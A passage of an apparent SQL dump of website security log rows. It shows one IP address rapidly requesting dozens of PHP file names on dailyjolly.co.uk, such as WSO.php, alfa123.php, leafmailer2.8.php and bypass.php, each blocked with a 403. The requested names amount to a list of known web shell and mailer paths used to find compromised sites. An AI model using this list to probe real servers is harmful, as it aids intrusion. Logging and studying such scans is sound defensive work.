3.5.30729)\"}','C3TYwmMuZb8AktEpvfc6RNxh',0,1674319466.3921,445,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/i.php?http://dailyjolly.co.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ezJEuZcGFiSXhb3Cl7KDOTNf',0,1674319469.0796,265,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/p.php?http://dailyjolly.co.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NlIFfaYOd6bpjhmw9UnkAzV2',0,1674319471.7048,203,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/q.php?http://dailyjolly.co.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zNVj1F87p9iGfeCAqw42MXho',0,1674319474.5723,260,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/s.php?http://dailyjolly.co.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OyPM9s4fNE3Ctz8I1ZG2lYap',0,1674319476.1483,300,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/d.php?http://dailyjolly.co.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','WJYCi6rB5Klj47mdakcEVNoR',0,1674319479.7335,577,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/h.php?http://dailyjolly.co.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','M4giCTw9sSBbLuqzfF2O1oGl',0,1674319482.5089,409,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/j.php?http://dailyjolly.co.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NmYZtJGj1eBkCrRHXyoFWhQP',0,1674319484.4026,216,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/k.php?http://dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nyDqobahp2l8CSQkLgIMYZf1',0,1674319486.6360,244,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/l.php?http://dailyjolly.co.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hMYlnJtp5FOL1VgB0EySPbsa',0,1674319488.4196,270,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/n.php?http://dailyjolly.co.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jdIGvTDos1eZX45VJ70MNyEm',0,1674319490.6116,238,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xindex.php?http://dailyjolly.co.uk/xindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','cf8bCBdAnah7louWN4U1MKeH',0,1674319492.4208,193,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/kindex.php?http://dailyjolly.co.uk/kindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','e0E5iTSAjXZ8qduQG2hLnkJU',0,1674319494.7744,285,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/FoxWSOv1.php?http://dailyjolly.co.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','L8fGl73NYeoXkOhMr2zmEiua',0,1674319497.5709,225,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alf.php?http://dailyjolly.co.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XaECswl6Mbit103ShG7OJIQv',0,1674319505.3832,244,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/bb.php?http://dailyjolly.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','laMotif7hsubWxjEkV5rI9DZ',0,1674319507.9289,257,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/lf.php?http://dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LoXedjmAQGvkJFTVy4zU5cb8',0,1674319509.4444,317,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/WSO.php?http://dailyjolly.co.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','CQn6WzENaJjylm7rpRfIk9Ks',0,1674319515.1797,261,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xxx.php?http://dailyjolly.co.uk/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vzIiVe0Y2GEsPXp5rSKyZfO9',0,1674319517.3447,207,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/hello.php?http://dailyjolly.co.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0IMxHNJQtgPpnrmO6Kdo9ZFV',0,1674319520.4236,217,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/ok.php?http://dailyjolly.co.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SQwYmpJxaseFILkOfRdrDz9T',0,1674319524.3386,202,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/if.php?http://dailyjolly.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','GkvRBU7ZtnH34YfOWAXNbxiE',0,1674319528.2297,234,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/kk.php?http://dailyjolly.co.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9KF2pOTcJoz3XDGesVPU6WEb',0,1674319531.3349,190,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/mrjn.php?http://dailyjolly.co.uk/mrjn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ahGTyDrz5Uq3gNnEJjKOpBPF',0,1674319533.3761,188,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/kn.php?http://dailyjolly.co.uk/kn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Eqs9IRVOgwPSjTQ4JF6GciHA',0,1674319535.4970,186,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/3301.php?http://dailyjolly.co.uk/3301.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','V1KXegnQTN9xAGalF0z3Lc2b',0,1674319538.9049,195,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/leaf.php?http://dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LATNIS2svb8xl1cohPjni7VZ',0,1674319541.6914,185,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alex.php?http://dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','FYwHiaPC5W0IcROE4guAj1Gd',0,1674319543.5523,190,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/mailer.php?http://dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','f5dFTkMwReQCxv7miqEDylrB',0,1674319545.4717,257,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/anone.php?http://dailyjolly.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sQWr9FJ4NG38qdh5wATSUByP',0,1674319549.0719,202,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-configer.php?http://dailyjolly.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','m8AzsSekBMETwWxHyd7cn0U3',0,1674319553.0031,217,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-ad.php?http://dailyjolly.co.uk/wp-ad.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JnSO7iRaMd4yUvPo5CEzGsYx',0,1674319555.8210,271,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/send.php?http://dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4KBZC6z0cWjuqedbxX5F3U9y',0,1674319558.7739,245,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/3.php?http://dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vCmdQjFyJI9zxXtbfOauAWE6',0,1674319564.2463,258,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/.wp-cache.php?http://dailyjolly.co.uk/.wp-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Cgxl3hZmNAIG2vEX5cKR1wJi',0,1674319570.4263,242,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/sendmail.php?http://dailyjolly.co.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','m5EZux4bNwcMGILOa6SkCDFv',0,1674319572.8342,182,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/rahma.php?http://dailyjolly.co.uk/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5PfCIJzs16Xam3qvD7eHE4nr',0,1674319574.4479,363,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/nasgor.php?http://dailyjolly.co.uk/nasgor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','CDeOJoxfQnFV8MAGEmzk1Lvc',0,1674319576.9196,188,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-confirm.php?http://dailyjolly.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EzVxfTnt5IQcKhC8SjRyop3O',0,1674319581.2281,183,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alfa123.php?http://dailyjolly.co.uk/alfa123.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XSu0nlPBjexps7qLRJwm2hEv',0,1674319583.0288,226,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/upload.php?http://dailyjolly.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AsUIlqxj4hJ1O6wcTW7CMpVn',0,1674319586.3753,442,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/bypass.php?http://dailyjolly.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZbxrO6Y4dciB1S0I8wJgeqpK',0,1674319590.4746,716,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-one.php?http://dailyjolly.co.uk/wp-one.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','GPFdJp9zhbsRIgD3CcYtSZu7',0,1674319592.8384,215,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alexus.php?http://dailyjolly.co.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','eukjvf4IpWNbihwaHZGdB9E5',0,1674319594.4306,202,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wso1337.php?http://dailyjolly.co.uk/wso1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','cAbmrY5yh3a9GlSN6Ev8WeUX',0,1674319596.4730,272,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/1337.php?http://dailyjolly.co.uk/1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dsIByj24tRai79mQxFzXqUJS',0,1674319598.6800,233,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/blog.php?http://dailyjolly.co.uk/blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AVqzXctsvgnR5DMNGZ7wPO8k',0,1674319600.1350,276,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/it.php?http://dailyjolly.co.uk/it.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ETK39CLSOGntWrs1HzAJQdPw',0,1674319602.9850,267,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/kiss.php?http://dailyjolly.co.uk/kiss.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lJ9hako7btL84QP0gO62UfTi',0,1674319605.6059,230,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/0.php?http://dailyjolly.co.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VSRKQ2imt0lxgJCnFEbTA4M3',0,1674319608.5426,239,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp2.php?http://dailyjolly.co.uk/wp2.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KaEi8gWCSszXjd4TVRMUBG0O',0,1674319610.6506,190,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/owl.php?http://dailyjolly.co.uk/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','POiMfAv3gxE8aqhWU9yNdc2u',0,1674319612.9514,265,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/vuln.php?http://dailyjolly.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6PaxrtLDdfBJ5YRzcEWSZvyQ',0,1674319615.4932,206,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/ohayo.php?http://dailyjolly.co.uk/ohayo.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bvxVyzOZprs9WDo4IN60GUBL',0,1674319617.5400,260,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin.php?http://dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','b71ijoBHsVl6LFkMO3uz0g9Q',0,1674319619.1538,251,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/cms.php?http://dailyjolly.co.uk/cms.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1IiVXvtCZKx7p9qR8Q6NzUOG',0,1674319621.1954,411,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-uploads.php?http://dailyjolly.co.uk/wp-uploads.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KfiVnebHU8I5ZQNM7j2FhkD3',0,1674319624.9088,236,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/Gel.php?http://dailyjolly.co.uk/Gel.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RiOQhqlvmuVfbGNsB1kgtpjZ',0,1674319627.1276,274,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/41.php?http://dailyjolly.co.uk/41.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dg8zMarqZB2tpNFm03cxXYu9',0,1674319629.9064,256,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/4price.php?http://dailyjolly.co.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oLOE35RIDAHhBfzFXNSngyqr',0,1674319631.4921,187,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/MARIJUANA.php?http://dailyjolly.co.uk/MARIJUANA.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DF0civYdAwVRNHU61zCkaPrM',0,1674319632.9822,185,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/.fk.php?http://dailyjolly.co.uk/.fk.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AWHpRNObLkgdqPtuFK475QED',0,1674319636.5963,213,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/XxX.php?http://dailyjolly.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IrZHDa4q2mSxzFgJTRdNiy68',0,1674319638.2234,215,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alexuse.php?http://dailyjolly.co.uk/alexuse.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RI45H2VsTyK1rGbk3mqPECu8',0,1674319640.1688,217,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/Sendemail.php?http://dailyjolly.co.uk/Sendemail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QO7SAjCTdBUNwh1s5buGqz3e',0,1674319641.6643,240,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/content.php?http://dailyjolly.co.uk/content.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2aZ6BIpf0xvHrWJRhUg5stC1',0,1674319643.4698,233,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/leafmailer2.8.php?http://dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','UXPQGWYSEirtOTpAef6kJv45',0,1674319644.9744,302,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/olu.php?http://dailyjolly.co.uk/olu.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7g8R0UIsO1dcQtk63aCSvEeG',0,1674319646.8675,281,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alexusmailer%202.0.php?http://dailyjolly.co.uk/alexusmailer%202.0.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8PjaVeqx2OvGHBl5iW3Q9X6T',0,1674319649.0564,294,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/rss.php?http://dailyjolly.co.uk/rss.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','G5Ewd2YBck47OgnPLIy9MupF',0,1674319651.1440,209,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alexus-mailer.php?http://dailyjolly.co.uk/alexus-mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','12ZXqHwnaIVCvAO7shYtQlpi',0,1674319653.9307,197,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-file.php?http://dailyjolly.co.uk/wp-file.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tcL7OyBp9hYWbf6TKa4XDUId',0,1674319655.5866,218,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wso2.php?http://dailyjolly.co.uk/wso2.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 